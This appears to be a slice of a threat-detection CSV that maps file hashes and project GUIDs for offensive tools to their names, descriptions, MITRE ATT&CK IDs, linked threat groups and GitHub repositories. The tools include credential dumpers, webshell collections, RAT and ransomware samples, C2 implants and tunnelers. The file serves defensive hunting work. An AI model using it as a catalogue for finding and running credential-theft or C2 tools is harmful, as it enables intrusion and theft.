"*580bfa0e4cbe1fd71f578f3daafcd0d869e0bc29adc849e12d0148b8cc016745*",".{0,1000}580bfa0e4cbe1fd71f578f3daafcd0d869e0bc29adc849e12d0148b8cc016745.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27089"
"*580ec64c62709841ca04ba73473f1e8681fde57ebbbbb81d1fe12b075b263057*",".{0,1000}580ec64c62709841ca04ba73473f1e8681fde57ebbbbb81d1fe12b075b263057.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","27090"
"*581100a0d03b60437fe963681f102ab80b89c6392007da57f54162ceeb4c5378*",".{0,1000}581100a0d03b60437fe963681f102ab80b89c6392007da57f54162ceeb4c5378.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27091"
"*5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7*",".{0,1000}5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27094"
"*582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4*",".{0,1000}582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27095"
"*58297eb7cad8589399f7b0bc92d61c144ee05786dfc06f527826965ae4062f99*",".{0,1000}58297eb7cad8589399f7b0bc92d61c144ee05786dfc06f527826965ae4062f99.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","27097"
"*583071fcb65b20e8164eb23a66e2147d7e7621bc944cbae675914cf23de98a6d*",".{0,1000}583071fcb65b20e8164eb23a66e2147d7e7621bc944cbae675914cf23de98a6d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27100"
"*58338E42-6010-493C-B8C8-2FD2CFC30FFB*",".{0,1000}58338E42\-6010\-493C\-B8C8\-2FD2CFC30FFB.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#GUIDproject","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","27101"
"*583409661e2afdf55553b7da2e510aef9cd10c542d98ebc4ee1962d1d4472bc1*",".{0,1000}583409661e2afdf55553b7da2e510aef9cd10c542d98ebc4ee1962d1d4472bc1.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#filehash","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","27102"
"*58359209e215a9fc0dafd14039121398559790dba9aa2398c457348ee1cb8a4d*",".{0,1000}58359209e215a9fc0dafd14039121398559790dba9aa2398c457348ee1cb8a4d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27103"
"*58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee*",".{0,1000}58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#filehash","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","27104"
"*584ed22563bcc356a615c44d376bb194cea96dd028f15f58b5f412bbd26008e8*",".{0,1000}584ed22563bcc356a615c44d376bb194cea96dd028f15f58b5f412bbd26008e8.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","27105"
"*5851121b0a7ef7c0b740d9b7912f6676317ebc41918187b3c4b7894842a0d3d4*",".{0,1000}5851121b0a7ef7c0b740d9b7912f6676317ebc41918187b3c4b7894842a0d3d4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27106"
"*5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d*",".{0,1000}5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27110"
"*585b1fd21dc719ef6cf74465e417e774dd3838e2cbf4e985da3f647fdc9674dc*",".{0,1000}585b1fd21dc719ef6cf74465e417e774dd3838e2cbf4e985da3f647fdc9674dc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27111"
"*585e550d0435ab335e6c7fdfb7a609b7b8ead766fc3ee7ef1f93113b1d51e5d3*",".{0,1000}585e550d0435ab335e6c7fdfb7a609b7b8ead766fc3ee7ef1f93113b1d51e5d3.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","27112"
"*5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5*",".{0,1000}5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27114"
"*5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d*",".{0,1000}5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27117"
"*58716a4f8ccd77613cef3c7872810b38550875b18b06677e7b9d7c8ae7e1d30c*",".{0,1000}58716a4f8ccd77613cef3c7872810b38550875b18b06677e7b9d7c8ae7e1d30c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27119"
"*5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1*",".{0,1000}5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","27120"
"*588158f3c721315eb00b31b4b1d2726f11ff6bef9d67ea98f3dc79f9a3c4159b*",".{0,1000}588158f3c721315eb00b31b4b1d2726f11ff6bef9d67ea98f3dc79f9a3c4159b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27122"
"*588a7a102ff2c2efc1c0b45e7ac717158e4f78ea4475a5e314cd23c6f08bc794*",".{0,1000}588a7a102ff2c2efc1c0b45e7ac717158e4f78ea4475a5e314cd23c6f08bc794.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#filehash","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","27124"
"*588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b*",".{0,1000}588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27125"
"*588d6bd5d9883e877c138c05ad6c30d4615b2eee7a7dd1d64c5f209ff27cf3b5*",".{0,1000}588d6bd5d9883e877c138c05ad6c30d4615b2eee7a7dd1d64c5f209ff27cf3b5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27126"
"*588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a*",".{0,1000}588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27127"
"*58933165962df4ae3312226433df5adb5e646bfce9d0370327b7856faaa4b241*",".{0,1000}58933165962df4ae3312226433df5adb5e646bfce9d0370327b7856faaa4b241.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27129"
"*58975a07474741bbe65b5cb0acccc8a20896027e1365d5543a2a9217d55ef879*",".{0,1000}58975a07474741bbe65b5cb0acccc8a20896027e1365d5543a2a9217d55ef879.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27131"
"*58993d929685b240f375125ce5ad0540f57f6eed29b6feebaff194c061119052*",".{0,1000}58993d929685b240f375125ce5ad0540f57f6eed29b6feebaff194c061119052.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","27132"
"*58ad0843f7f9e999e35a9f41aff3c5f67e63194ad08359b323923c2be9674d52*",".{0,1000}58ad0843f7f9e999e35a9f41aff3c5f67e63194ad08359b323923c2be9674d52.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27135"
"*58add3b1ecdd2a00d7f5f40fe04e46dff4beff64fa127f6a6b045d6788d58c1dd19675241841b5b15e4095ce39a01387609572d83acc5def7a04564ece79987a7b19cf1ecca6c5d672b91d94239079a30e7130a099fc7d9c8fc94d07*",".{0,1000}58add3b1ecdd2a00d7f5f40fe04e46dff4beff64fa127f6a6b045d6788d58c1dd19675241841b5b15e4095ce39a01387609572d83acc5def7a04564ece79987a7b19cf1ecca6c5d672b91d94239079a30e7130a099fc7d9c8fc94d07.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#certificate","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","27136"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","27137"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27138"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27139"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27140"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27141"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27142"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27143"
"*58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec*",".{0,1000}58ae9b923139f8bed83bed67aae0bf2e56bfec9901009e61c4e4b6b375050bec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27144"
"*58b002643e9749100cc28705f590acc31b8e1ea19f542aead17c109f1f938f32*",".{0,1000}58b002643e9749100cc28705f590acc31b8e1ea19f542aead17c109f1f938f32.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","27145"
"*58B32FCA-F385-4500-9A8E-7CBA1FC9BA13*",".{0,1000}58B32FCA\-F385\-4500\-9A8E\-7CBA1FC9BA13.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#GUIDproject","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","27146"
"*58b90ade2d52bd1436e28c1930315aa46eedd5df7ff89f4ef66554933b2792b8*",".{0,1000}58b90ade2d52bd1436e28c1930315aa46eedd5df7ff89f4ef66554933b2792b8.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","27147"
"*58ba7d7a43c3cbf5ffba7351a6509d04290b41ac5565735c6b6b66ffaf2daaca*",".{0,1000}58ba7d7a43c3cbf5ffba7351a6509d04290b41ac5565735c6b6b66ffaf2daaca.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#filehash","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","27148"
"*58c2cf7ff89c1fc1871e507f0c1a467dcf37b45d094d73c61b0ded0f935eec98*",".{0,1000}58c2cf7ff89c1fc1871e507f0c1a467dcf37b45d094d73c61b0ded0f935eec98.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","27149"
"*58c42e01802aa60be17c26ee13705be9d17a7578a7aad62b19758b2f96c5d455*",".{0,1000}58c42e01802aa60be17c26ee13705be9d17a7578a7aad62b19758b2f96c5d455.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27150"
"*58c4d3ad2f3ffb337d715f4233e5e15a97ba83e51be154956e4e173f31aa3de5*",".{0,1000}58c4d3ad2f3ffb337d715f4233e5e15a97ba83e51be154956e4e173f31aa3de5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27151"
"*58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc*",".{0,1000}58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","27152"
"*58d80168520f8d397087fea5495f9955f7a1399131f5b963d168950ec2f2a446*",".{0,1000}58d80168520f8d397087fea5495f9955f7a1399131f5b963d168950ec2f2a446.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27154"
